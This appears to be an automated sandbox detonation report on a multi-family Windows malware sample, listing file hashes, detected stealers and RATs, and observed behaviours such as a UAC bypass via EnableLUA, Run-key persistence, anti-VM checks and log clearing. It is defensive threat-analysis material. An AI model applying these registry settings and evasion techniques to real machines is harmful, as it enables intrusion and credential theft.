| SHA512 | a32017c99f3ce240e58e9f98e637a7e816636569f9307fad361feb2e17a22236888270223644aa1e4cb695a361ef94666b86be7c9f059a7273faf14fff5e96c4 |
C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe
| MD5 | 8e0d340e723ce188de651b8ffb887d81 |
| SHA1 | cb90a07f1a4ffae68cca6281325606009d3d7266 |
| SHA256 | 514c0d56b0b5ea74a2729c99adcc92cd4b51795498281c1675636bb5b9d17cb7 |
| SHA512 | d5505ef82f69085b975312255bb733f66a97850ecb6608000ba642ec7d2997a88a184d230c38acfe01a9d33adf0b46b88a59d4b97bf11ae9a45b7b9c7e2904e1 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 7ca60496f49b36a55f754ef4e4d796f9 |
| SHA1 | e672b9606b4b99b5849b848773c62ce39a0d7446 |
| SHA256 | 1ea32702f54098c48e469e90a4fdb50c71a7585d76b6f7f72e52b94f667e6a12 |
| SHA512 | 80cf061f3a88a9964d09ce6395a2857ad1ed1b1611ac6eaef4a95ca1f2ed2580142a041276407fc80e670dad3fd6846e29363cd33d27c67f852cb9a9bcc8cbb1 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | f87f3d5de6100718cf2389fcfe5014f6 |
| SHA1 | 63c292cd701507e3d33a97367d88c56915d45a54 |
| SHA256 | 5305f4c6adf2d2f367a57cc28d6599b6d0949ec913e742b6ca7c815cf7ff225a |
| SHA512 | bef4476ba269b636c76c38e2a515eb3bffc28ea21cd4e97b1b9a15d57d7f125e394c5b92fd57c1310277438071c4d38bea255445a7605db6a364cf7f3a9f6368 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 5f1cc8b91f1fa3f7bf05c943f9bfa405 |
| SHA1 | 3b67d5f9675883764067d9ce27c451f2b410fbd3 |
| SHA256 | f04e6e10b5b459c460d9e9cdc7ee46c2db88521eacfd9ca4a5aa978fce4373e4 |
| SHA512 | b7e967c6863b54414984e557a63df26c79514e624e1aba33879f870f5ea6257e35676db6fdc6e700162829de2a90076bb0607d0475e9aa2480e0358b56df1dcc |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 9fe4a19e60afbd686376ed11561c60e4 |
| SHA1 | 465b36378d99f68d150051f74b97f4d40a058edf |
| SHA256 | 54c8b81ba485c73c4eef155a429dbbdf7ee13f5e29552cb6c7827c50c64383a3 |
| SHA512 | 83b96f9b49f4dd56d4136cce2c9511a742dab0ef8b84886fe8381e4d80c47ed2636e5dad829e7c345ffe794870404280895618e7153ae52a0346dca1447a1ada |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 68617799427118e67ca7e8e32534d5e2 |
| SHA1 | bb48fdc70d6f85bbcf0d6df8ec1fe884b909d732 |
| SHA256 | a172eca9aa1203f313aa2260a55370b8f66163e2ab6ccffa5eccf37163464aa5 |
| SHA512 | f4e5711e28410bd5f8f44246b208091d642f4bb22233df5b639acde0b3fe290b2d171f4a62dd6540b6dde3abf9b427ebd562c241a5c8854b27417d16aa25bafc |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 3a2be1963f060dc0a503bb41cca11d5b |
| SHA1 | 9658c4c1394ce01257d94b1f871459477f254f01 |
| SHA256 | e54b0d0762b2ec007d6cd730949105af6c1afac4988b336649d3a30230e17295 |
| SHA512 | 9b2d0f5f3468ebc08bcd0388a3916bf8204e20b3f209e66c8c688fdb28d951701dc9442aa9f9a4ee0a7c963c5d4c2004f32ebadc0d958f38f9ba4c264d092a47 |
C:\ProgramData\AnyDesk\service.conf
| MD5 | 39447b6c4901c5bf75fd4c451dcaa6f5 |
| SHA1 | 93cb272e7da05795bcb13589c787952861176699 |
| SHA256 | 618bd9a73875072a768992de3fab5b12bd64c0b6d14321f13e7a4760b556f734 |
| SHA512 | 5aa990f2492b78ec8d154329b3de8503448081f4062b34f748a43d99774460dfe1f9ee76ee91a52ff7b3451495149d90d57ce205edbcc4f5a4ab5f077bbb349b |
C:\ProgramData\AnyDesk\service.conf
| MD5 | 3d98c6ff7e60e0498d815cb2dfb6f486 |
| SHA1 | f9844db3a2aebb4925443e6a6855adb660329e23 |
| SHA256 | c917d55804468ad523497c2cff0f4faaf930afbd1ffca82a768c0e9dd1239f8b |
| SHA512 | e8727674c1b528d2d3edc7ad4e8c3f01c7becb8f6a24cc606865a432fc2a049facb9b3bf228d8d4ca4a49361853b07e1d33e3de2c3b8d92a9e9d6bf053cdf20e |
C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe
| MD5 | d9694a6a1989d79aeded3f93cb97d24e |
| SHA1 | a18019b9793029dac4d10e619ec85ea26909336a |
| SHA256 | 772c7a131d2a7a239ec39f32214eb94113aacd3984f572fb7e3b1fa1bec98f8c |
| SHA512 | 35a29c81d72f0e0bdb169c400dc90bf85859313c250824bf1fbbe362903c63f6a826e94994f8d86e8f56def5ce34cc71a45c6ff936e85fcfe8d169dbdb118168 |
C:\Users\Admin\AppData\Local\Temp\a\srtware.exe
| MD5 | e364a1bd0e0be70100779ff5389a78da |
| SHA1 | dd8269db6032720dbac028931e28a6588fca7bae |
| SHA256 | 7c8798ab738b8648a5faa9d157c0711be645fabf49c355a77477fb8da5df360e |
| SHA512 | ff2ebfe652cdace05243df45100d5f8e306f65a128ec0b5395d1cc7be429e1b4090f744860963ef9996f74bccee134f198e9a6b0ff14383a404c6e4c9e6ef338 |
C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe
| MD5 | 2d0600fe2b1b3bdc45d833ca32a37fdb |
| SHA1 | e9a7411bfef54050de3b485833556f84cabd6e41 |
| SHA256 | effdea83c6b7a1dc2ce9e9d40e91dfd59bed9fcbd580903423648b7ca97d9696 |
| SHA512 | 9891cd6d2140c3a5c20d5c2d6600f3655df437b99b09ae0f9daf1983190dc73385cc87f02508997bb696ac921eee43fccdf1dc210cc602938807bdb062ce1703 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\PingDisconnect.docx
| MD5 | 157d2cbfd55615fe5ca2b0ae21b066a9 |
| SHA1 | 825856657c8711e9fb4c26db49e234cc24c23509 |
| SHA256 | c239c0c41f3a5919581dc83c9bbce497fa0979ed88ab8c1543393da2a3e5ee41 |
| SHA512 | 14a0dfc952473cbed5e9f856664e3a01e9847d9c90078e29fa001ceeb8a1d641c3f69291955e78962e8fdf525be270814509d83e07df87dc8894130594ab4651 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\DebugDisable.xlsx
| MD5 | 0d2a1fc5449e8722a23d559eb3ab35fc |
| SHA1 | b6b784ff9157a34892d2415861d53f34e797f8ed |
| SHA256 | 22b67a562208e10e3b61e1799f50c2a620e3c7ea8f5bcb4022b1bb926b2a60fe |
| SHA512 | 2c818df5ac648778fcc3022c310daed07d2cc93c26bf4c53b076bf5826773d9d5f421c55c1b9d92a1915fb8e9061d4a31eb702859c520880e25c32fafc640bca |
C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe
| MD5 | ff7e78da9c8e580229fe95dfdfe5b098 |
| SHA1 | ab968e47e463f29426116753b0ca086fd5b33cdb |
| SHA256 | cefa40083339d42320bc1f9ba33c578b8abe47e15eb0dd6b0ba2f734aa8f3d6d |
| SHA512 | 45517b8bc96613daeabb738a42188b8ef19b0ac2b53e3202f7d86f683dacdbe1c4a78414938ab5ad0b48b7c546bc89a78932e3b8a1dbf6604e59b4887de48409 |
C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe
| MD5 | d6b16370cd4e60185aa88607316a0c05 |
| SHA1 | 7fbc63b1203617c67e5491745beaedb424baed78 |
| SHA256 | a6d6d1c8299f97f966d72373e999b5a8e6768914e27d5533307cf6878b95dce2 |
| SHA512 | 16c468948e568343ab1a1460d82b4c5859d09043e3a0115aa9c0aefeabfa22c796cca505ede8b1f194764dda7c5263979230e3fa272ee1fb3b21919202b01906 |
C:\Users\Admin\AppData\Local\Temp\a\02.08.2022.exe
| MD5 | 12d7ae10b1836cd3091d712723a5a4d6 |
| SHA1 | b99fef462f433da1b959c69dfe62703d12464ea7 |
| SHA256 | 8c56614bca1aaaabe522c46bb14ad9237a9d80783725b729feb4b255c8aca445 |
| SHA512 | ab3dd7772ff74a3b48033be5011edc065425e225c5c1c489cd28c6791bd24fc14be01105b97e14dee6ed4b5f453a986048d1a91808619dad518c43065ebc699a |
C:\ProgramData\AnyDesk\system.conf
| MD5 | e437ee3038b3131ac7530b7297d6c680 |
| SHA1 | 40313dee0933ece473782392e1e6b135a98ffaae |
| SHA256 | a0bb637575c3101133977bad99d853e8c23b7f63f7ad05b4a03e2ac26a220a68 |
| SHA512 | 8b0db6a42d77d01a1a1c8f584feb59cbc1c776c4cca87cedbc94887892ae569155199c3db344fdb2075e7bf4302fcfdaf9511efca6aa77204607bc1aecf5dd18 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | a56ea93ad882910cf87db920b65c691c |
| SHA1 | 0b7140fb8ad96c300949dc0c9adc5d6270a2d586 |
| SHA256 | 9a0c1d4188aa276a71668cdced886a6d8ccf36c6dab65540c2be03513ee91998 |
| SHA512 | f1a751cb409ca8f65685eb5edeaa329eb4d42e175625307265d5f43eea04c68a072f0a0228abaff08fb4f471cbfa730b3310dc71124f74c6adb9111d9c2f6758 |
C:\ProgramData\AnyDesk\service.conf
| MD5 | 8a3ee5e9ae7cefdb20d13a8a5bea198a |
| SHA1 | 2a3fe3f4253f73118faeba5940487df2434e3a96 |
| SHA256 | a0749b90ce94a1fa159d034860dc3793f6b08d93bbd1dd94933fc8129a4c602a |
| SHA512 | 2c7e84d64ba0237a2e7afaa93834da585fde62c290b9518dc6b957c46b838ee8f73a398318cec9ea7551dea78857898816e94ef31a09e8cb1da4403b92e5cca9 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-12-12 18:20
Reported
2024-12-12 18:25
Platform
win10v2004-20241007-en
Max time kernel
201s
Max time network
300s
Command Line
Signatures
44Caliber
44Caliber family
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Gurcu family
Gurcu, WhiteSnake
Lumma Stealer, LummaC
Lumma family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RMS
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
Rms family
Stealc
Stealc family
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1972 created 5772 | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe |
| PID 4792 created 1920 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe |
| PID 5224 created 4388 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe |
| PID 1888 created 2976 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Umbral
Umbral family
Xworm
Xworm family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\qwex.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" | C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftProfile = "C:\\Users\\Admin\\MicrosoftProfile.exe" | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantApp_Installer.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
